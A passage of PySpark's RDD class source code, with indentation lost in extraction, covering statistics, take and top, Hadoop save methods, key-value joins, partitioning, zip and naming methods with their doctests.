def stdev(self):
"""
Compute the standard deviation of this RDD's elements.
>>> sc.parallelize([1, 2, 3]).stdev()
0.816...
"""
return self.stats().stdev()
def sampleStdev(self):
"""
Compute the sample standard deviation of this RDD's elements (which
corrects for bias in estimating the standard deviation by dividing by
N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleStdev()
1.0
"""
return self.stats().sampleStdev()
def sampleVariance(self):
"""
Compute the sample variance of this RDD's elements (which corrects
for bias in estimating the variance by dividing by N-1 instead of N).
>>> sc.parallelize([1, 2, 3]).sampleVariance()
1.0
"""
return self.stats().sampleVariance()
def countByValue(self):
"""
Return the count of each unique value in this RDD as a dictionary of
(value, count) pairs.
>>> sorted(sc.parallelize([1, 2, 1, 2, 2], 2).countByValue().items())
[(1, 2), (2, 3)]
"""
def countPartition(iterator):
counts = defaultdict(int)
for obj in iterator:
counts[obj] += 1
yield counts
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] += v
return m1
return self.mapPartitions(countPartition).reduce(mergeMaps)
def top(self, num, key=None):
"""
Get the top N elements from an RDD.
.. note:: This method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
.. note:: It returns the list sorted in descending order.
>>> sc.parallelize([10, 4, 2, 12, 3]).top(1)
[12]
>>> sc.parallelize([2, 3, 4, 5, 6], 2).top(2)
[6, 5]
>>> sc.parallelize([10, 4, 2, 12, 3]).top(3, key=str)
[4, 3, 2]
"""
def topIterator(iterator):
yield heapq.nlargest(num, iterator, key=key)
def merge(a, b):
return heapq.nlargest(num, a + b, key=key)
return self.mapPartitions(topIterator).reduce(merge)
def takeOrdered(self, num, key=None):
"""
Get the N elements from an RDD ordered in ascending order or as
specified by the optional key function.
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7]).takeOrdered(6)
[1, 2, 3, 4, 5, 6]
>>> sc.parallelize([10, 1, 2, 9, 3, 4, 5, 6, 7], 2).takeOrdered(6, key=lambda x: -x)
[10, 9, 7, 6, 5, 4]
"""
def merge(a, b):
return heapq.nsmallest(num, a + b, key)
return self.mapPartitions(lambda it: [heapq.nsmallest(num, it, key)]).reduce(merge)
def take(self, num):
"""
Take the first num elements of the RDD.
It works by first scanning one partition, and use the results from
that partition to estimate the number of additional partitions needed
to satisfy the limit.
Translated from the Scala implementation in RDD#take().
.. note:: this method should only be used if the resulting array is expected
to be small, as all the data is loaded into the driver's memory.
>>> sc.parallelize([2, 3, 4, 5, 6]).cache().take(2)
[2, 3]
>>> sc.parallelize([2, 3, 4, 5, 6]).take(10)
[2, 3, 4, 5, 6]
>>> sc.parallelize(range(100), 100).filter(lambda x: x > 90).take(3)
[91, 92, 93]
"""
items = []
totalParts = self.getNumPartitions()
partsScanned = 0
while len(items) < num and partsScanned < totalParts:
# The number of partitions to try in this iteration.
# It is ok for this number to be greater than totalParts because
# we actually cap it at totalParts in runJob.
numPartsToTry = 1
if partsScanned > 0:
# If we didn't find any rows after the previous iteration,
# quadruple and retry. Otherwise, interpolate the number of
# partitions we need to try, but overestimate it by 50%.
# We also cap the estimation in the end.
if len(items) == 0:
numPartsToTry = partsScanned * 4
else:
# the first paramter of max is >=1 whenever partsScanned >= 2
numPartsToTry = int(1.5 * num * partsScanned / len(items)) - partsScanned
numPartsToTry = min(max(numPartsToTry, 1), partsScanned * 4)
left = num - len(items)
def takeUpToNumLeft(iterator):
iterator = iter(iterator)
taken = 0
while taken < left:
yield next(iterator)
taken += 1
p = range(partsScanned, min(partsScanned + numPartsToTry, totalParts))
res = self.context.runJob(self, takeUpToNumLeft, p)
items += res
partsScanned += numPartsToTry
return items[:num]
def first(self):
"""
Return the first element in this RDD.
>>> sc.parallelize([2, 3, 4]).first()
2
>>> sc.parallelize([]).first()
Traceback (most recent call last):
...
ValueError: RDD is empty
"""
rs = self.take(1)
if rs:
return rs[0]
raise ValueError("RDD is empty")
def isEmpty(self):
"""
Returns true if and only if the RDD contains no elements at all.
.. note:: an RDD may be empty even when it has at least 1 partition.
>>> sc.parallelize([]).isEmpty()
True
>>> sc.parallelize([1]).isEmpty()
False
"""
return self.getNumPartitions() == 0 or len(self.take(1)) == 0
def saveAsNewAPIHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, True)
def saveAsNewAPIHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the new Hadoop OutputFormat API (mapreduce package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop job configuration, passed in as a dict (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsNewAPIHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter, jconf)
def saveAsHadoopDataset(self, conf, keyConverter=None, valueConverter=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Keys/values are
converted for output using either user specified converters or, by default,
L{org.apache.spark.api.python.JavaToWritableConverter}.
:param conf: Hadoop job configuration, passed in as a dict
:param keyConverter: (None by default)
:param valueConverter: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopDataset(pickledRDD._jrdd, True, jconf,
keyConverter, valueConverter, False)
def saveAsHadoopFile(self, path, outputFormatClass, keyClass=None, valueClass=None,
keyConverter=None, valueConverter=None, conf=None,
compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the old Hadoop OutputFormat API (mapred package). Key and value types
will be inferred if not specified. Keys and values are converted for output using either
user specified converters or L{org.apache.spark.api.python.JavaToWritableConverter}. The
C{conf} is applied on top of the base Hadoop conf associated with the SparkContext
of this RDD to create a merged Hadoop MapReduce job configuration for saving the data.
:param path: path to Hadoop file
:param outputFormatClass: fully qualified classname of Hadoop OutputFormat
(e.g. "org.apache.hadoop.mapred.SequenceFileOutputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.IntWritable", None by default)
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.Text", None by default)
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: (None by default)
:param compressionCodecClass: (None by default)
"""
jconf = self.ctx._dictToJavaMap(conf)
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsHadoopFile(pickledRDD._jrdd, True, path,
outputFormatClass,
keyClass, valueClass,
keyConverter, valueConverter,
jconf, compressionCodecClass)
def saveAsSequenceFile(self, path, compressionCodecClass=None):
"""
Output a Python RDD of key-value pairs (of form C{RDD[(K, V)]}) to any Hadoop file
system, using the L{org.apache.hadoop.io.Writable} types that we convert from the
RDD's key and value types. The mechanism is as follows:
1. Pyrolite is used to convert pickled Python RDD into RDD of Java objects.
2. Keys and values of this Java RDD are converted to Writables and written out.
:param path: path to sequence file
:param compressionCodecClass: (None by default)
"""
pickledRDD = self._pickled()
self.ctx._jvm.PythonRDD.saveAsSequenceFile(pickledRDD._jrdd, True,
path, compressionCodecClass)
def saveAsPickleFile(self, path, batchSize=10):
"""
Save this RDD as a SequenceFile of serialized objects. The serializer
used is L{pyspark.serializers.PickleSerializer}, default batch size
is 10.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize([1, 2, 'spark', 'rdd']).saveAsPickleFile(tmpFile.name, 3)
>>> sorted(sc.pickleFile(tmpFile.name, 5).map(str).collect())
['1', '2', 'rdd', 'spark']
"""
if batchSize == 0:
ser = AutoBatchedSerializer(PickleSerializer())
else:
ser = BatchedSerializer(PickleSerializer(), batchSize)
self._reserialize(ser)._jrdd.saveAsObjectFile(path)
@ignore_unicode_prefix
def saveAsTextFile(self, path, compressionCodecClass=None):
"""
Save this RDD as a text file, using string representations of elements.
@param path: path to text file
@param compressionCodecClass: (None by default) string i.e.
"org.apache.hadoop.io.compress.GzipCodec"
>>> tempFile = NamedTemporaryFile(delete=True)
>>> tempFile.close()
>>> sc.parallelize(range(10)).saveAsTextFile(tempFile.name)
>>> from fileinput import input
>>> from glob import glob
>>> ''.join(sorted(input(glob(tempFile.name + "/part-0000*"))))
'0\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n'
Empty lines are tolerated when saving to text files.
>>> tempFile2 = NamedTemporaryFile(delete=True)
>>> tempFile2.close()
>>> sc.parallelize(['', 'foo', '', 'bar', '']).saveAsTextFile(tempFile2.name)
>>> ''.join(sorted(input(glob(tempFile2.name + "/part-0000*"))))
'\\n\\n\\nbar\\nfoo\\n'
Using compressionCodecClass
>>> tempFile3 = NamedTemporaryFile(delete=True)
>>> tempFile3.close()
>>> codec = "org.apache.hadoop.io.compress.GzipCodec"
>>> sc.parallelize(['foo', 'bar']).saveAsTextFile(tempFile3.name, codec)
>>> from fileinput import input, hook_compressed
>>> result = sorted(input(glob(tempFile3.name + "/part*.gz"), openhook=hook_compressed))
>>> b''.join(result).decode('utf-8')
u'bar\\nfoo\\n'
"""
def func(split, iterator):
for x in iterator:
if not isinstance(x, (unicode, bytes)):
x = unicode(x)
if isinstance(x, unicode):
x = x.encode("utf-8")
yield x
keyed = self.mapPartitionsWithIndex(func)
keyed._bypass_serializer = True
if compressionCodecClass:
compressionCodec = self.ctx._jvm.java.lang.Class.forName(compressionCodecClass)
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path, compressionCodec)
else:
keyed._jrdd.map(self.ctx._jvm.BytesToString()).saveAsTextFile(path)
# Pair functions
def collectAsMap(self):
"""
Return the key-value pairs in this RDD to the master as a dictionary.
.. note:: this method should only be used if the resulting data is expected
to be small, as all the data is loaded into the driver's memory.
>>> m = sc.parallelize([(1, 2), (3, 4)]).collectAsMap()
>>> m[1]
2
>>> m[3]
4
"""
return dict(self.collect())
def keys(self):
"""
Return an RDD with the keys of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).keys()
>>> m.collect()
[1, 3]
"""
return self.map(lambda x: x[0])
def values(self):
"""
Return an RDD with the values of each tuple.
>>> m = sc.parallelize([(1, 2), (3, 4)]).values()
>>> m.collect()
[2, 4]
"""
return self.map(lambda x: x[1])
def reduceByKey(self, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative and commutative reduce function.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
Output will be partitioned with C{numPartitions} partitions, or
the default parallelism level if C{numPartitions} is not specified.
Default partitioner is hash-partition.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKey(add).collect())
[('a', 2), ('b', 1)]
"""
return self.combineByKey(lambda x: x, func, func, numPartitions, partitionFunc)
def reduceByKeyLocally(self, func):
"""
Merge the values for each key using an associative and commutative reduce function, but
return the results immediately to the master as a dictionary.
This will also perform the merging locally on each mapper before
sending results to a reducer, similarly to a "combiner" in MapReduce.
>>> from operator import add
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.reduceByKeyLocally(add).items())
[('a', 2), ('b', 1)]
"""
func = fail_on_stopiteration(func)
def reducePartition(iterator):
m = {}
for k, v in iterator:
m[k] = func(m[k], v) if k in m else v
yield m
def mergeMaps(m1, m2):
for k, v in m2.items():
m1[k] = func(m1[k], v) if k in m1 else v
return m1
return self.mapPartitions(reducePartition).reduce(mergeMaps)
def countByKey(self):
"""
Count the number of elements for each key, and return the result to the
master as a dictionary.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.countByKey().items())
[('a', 2), ('b', 1)]
"""
return self.map(lambda x: x[0]).countByValue()
def join(self, other, numPartitions=None):
"""
Return an RDD containing all pairs of elements with matching keys in
C{self} and C{other}.
Each pair of elements will be returned as a (k, (v1, v2)) tuple, where
(k, v1) is in C{self} and (k, v2) is in C{other}.
Performs a hash join across the cluster.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("a", 3)])
>>> sorted(x.join(y).collect())
[('a', (1, 2)), ('a', (1, 3))]
"""
return python_join(self, other, numPartitions)
def leftOuterJoin(self, other, numPartitions=None):
"""
Perform a left outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(x.leftOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None))]
"""
return python_left_outer_join(self, other, numPartitions)
def rightOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, w) in C{other}, the resulting RDD will either
contain all pairs (k, (v, w)) for v in this, or the pair (k, (None, w))
if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> sorted(y.rightOuterJoin(x).collect())
[('a', (2, 1)), ('b', (None, 4))]
"""
return python_right_outer_join(self, other, numPartitions)
def fullOuterJoin(self, other, numPartitions=None):
"""
Perform a right outer join of C{self} and C{other}.
For each element (k, v) in C{self}, the resulting RDD will either
contain all pairs (k, (v, w)) for w in C{other}, or the pair
(k, (v, None)) if no elements in C{other} have key k.
Similarly, for each element (k, w) in C{other}, the resulting RDD will
either contain all pairs (k, (v, w)) for v in C{self}, or the pair
(k, (None, w)) if no elements in C{self} have key k.
Hash-partitions the resulting RDD into the given number of partitions.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2), ("c", 8)])
>>> sorted(x.fullOuterJoin(y).collect())
[('a', (1, 2)), ('b', (4, None)), ('c', (None, 8))]
"""
return python_full_outer_join(self, other, numPartitions)
# TODO: add option to control map-side combining
# portable_hash is used as default, because builtin hash of None is different
# cross machines.
def partitionBy(self, numPartitions, partitionFunc=portable_hash):
"""
Return a copy of the RDD partitioned using the specified partitioner.
>>> pairs = sc.parallelize([1, 2, 3, 4, 2, 4, 1]).map(lambda x: (x, x))
>>> sets = pairs.partitionBy(2).glom().collect()
>>> len(set(sets[0]).intersection(set(sets[1])))
0
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
partitioner = Partitioner(numPartitions, partitionFunc)
if self.partitioner == partitioner:
return self
# Transferring O(n) objects to Java is too expensive.
# Instead, we'll form the hash buckets in Python,
# transferring O(numPartitions) objects to Java.
# Each object is a (splitNumber, [objects]) pair.
# In order to avoid too huge objects, the objects are
# grouped into chunks.
outputSerializer = self.ctx._unbatched_serializer
limit = (_parse_memory(self.ctx._conf.get(
"spark.python.worker.memory", "512m")) / 2)
def add_shuffle_key(split, iterator):
buckets = defaultdict(list)
c, batch = 0, min(10 * numPartitions, 1000)
for k, v in iterator:
buckets[partitionFunc(k) % numPartitions].append((k, v))
c += 1
# check used memory and avg size of chunk of objects
if (c % 1000 == 0 and get_used_memory() > limit
or c > batch):
n, size = len(buckets), 0
for split in list(buckets.keys()):
yield pack_long(split)
d = outputSerializer.dumps(buckets[split])
del buckets[split]
yield d
size += len(d)
avg = int(size / n) >> 20
# let 1M < avg < 10M
if avg < 1:
batch *= 1.5
elif avg > 10:
batch = max(int(batch / 1.5), 1)
c = 0
for split, items in buckets.items():
yield pack_long(split)
yield outputSerializer.dumps(items)
keyed = self.mapPartitionsWithIndex(add_shuffle_key, preservesPartitioning=True)
keyed._bypass_serializer = True
with SCCallSiteSync(self.context) as css:
pairRDD = self.ctx._jvm.PairwiseRDD(
keyed._jrdd.rdd()).asJavaPairRDD()
jpartitioner = self.ctx._jvm.PythonPartitioner(numPartitions,
id(partitionFunc))
jrdd = self.ctx._jvm.PythonRDD.valueOfPair(pairRDD.partitionBy(jpartitioner))
rdd = RDD(jrdd, self.ctx, BatchedSerializer(outputSerializer))
rdd.partitioner = partitioner
return rdd
# TODO: add control over map-side aggregation
def combineByKey(self, createCombiner, mergeValue, mergeCombiners,
numPartitions=None, partitionFunc=portable_hash):
"""
Generic function to combine the elements for each key using a custom
set of aggregation functions.
Turns an RDD[(K, V)] into a result of type RDD[(K, C)], for a "combined
type" C.
Users provide three functions:
- C{createCombiner}, which turns a V into a C (e.g., creates
a one-element list)
- C{mergeValue}, to merge a V into a C (e.g., adds it to the end of
a list)
- C{mergeCombiners}, to combine two C's into a single one (e.g., merges
the lists)
To avoid memory allocation, both mergeValue and mergeCombiners are allowed to
modify and return their first argument instead of creating a new C.
In addition, users can control the partitioning of the output RDD.
.. note:: V and C can be different -- for example, one might group an RDD of type
(Int, Int) into an RDD of type (Int, List[Int]).
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 2)])
>>> def to_list(a):
... return [a]
...
>>> def append(a, b):
... a.append(b)
... return a
...
>>> def extend(a, b):
... a.extend(b)
... return a
...
>>> sorted(x.combineByKey(to_list, append, extend).collect())
[('a', [1, 2]), ('b', [1])]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's, The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
.. note:: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom parittioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
return self.coalesce(numPartitions, shuffle=True)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
if shuffle:
# Decrease the batch size in order to distribute evenly the elements across output
# partitions. Otherwise, repartition will possibly produce highly skewed partitions.
batchSize = min(10, self.ctx._batchSize or 1024)
ser = BatchedSerializer(PickleSerializer(), batchSize)
selfCopy = self._reserialize(ser)
jrdd_deserializer = selfCopy._jrdd_deserializer
jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle)
else:
jrdd_deserializer = self._jrdd_deserializer
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partitions.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
